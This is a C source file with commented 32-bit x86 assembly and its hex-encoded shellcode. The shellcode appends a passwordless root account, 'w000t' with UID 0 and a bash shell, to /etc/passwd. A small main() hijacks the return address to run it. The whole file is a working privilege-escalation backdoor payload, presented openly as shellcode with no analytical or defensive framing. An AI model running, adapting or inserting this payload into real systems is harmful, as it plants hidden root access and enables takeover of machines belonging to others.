/* This shellcode open() /etc/passwd and write() w000t::0:0:s4fem0de:/root:/bin/bash to it. It will then close() and do an exit() Written by zillion@safemode.org BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 11], al ; terminate /etc/passwd mov byte [esi + 48], al ; terminate our string bash mov byte [esi + 47], 0x9 ; this will become the newline (man ascii) inc byte [esi + 47] mov al, 5 ; the syscall open() = 5 lea ebx, [esi] ; argument1 mov cx, 1090 ; 1024 (append) + 64 (create if no exist) + 2 rw mov dx, 744q ; if we need to create, these are the permissions int 0x80 ; kernel int mov long ebx,eax ; get the descriptor mov al, 4 ; write system call lea ecx,[esi + 12] ; the location of our data mov dx,9993 ; 36 bytes is what we need to write sub dx,9957 int 0x80 ; kernel interrupt mov al, 6 ; the close syscall = 6 int 0x80 ; clozzzz mov al, 0x01 ; exist system call xor ebx, ebx ; clean up int 0x80 ; and bail out callit: call doit db '/etc/passwd#' db 'w000t::0:0:s4fem0de:/root:/bin/bash##' */ char shellcode[] = "\xeb\x3a\x5e\x31\xc0\x88\x46\x0b\x88\x46\x30\xc6\x46\x2f\x09" "\xfe\x46\x2f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01" "\xcd\x80\x89\xc3\xb0\x04\x8d\x4e\x0c\x66\xba\x09\x27\x66\x81" "\xea\xe5\x26\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80" "\xe8\xc1\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77" "\x64\x23\x77\x30\x30\x30\x74\x3a\x3a\x30\x3a\x30\x3a\x73\x34" "\x66\x65\x6d\x30\x64\x65\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62" "\x69\x6e\x2f\x62\x61\x73\x68\x23\x23"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }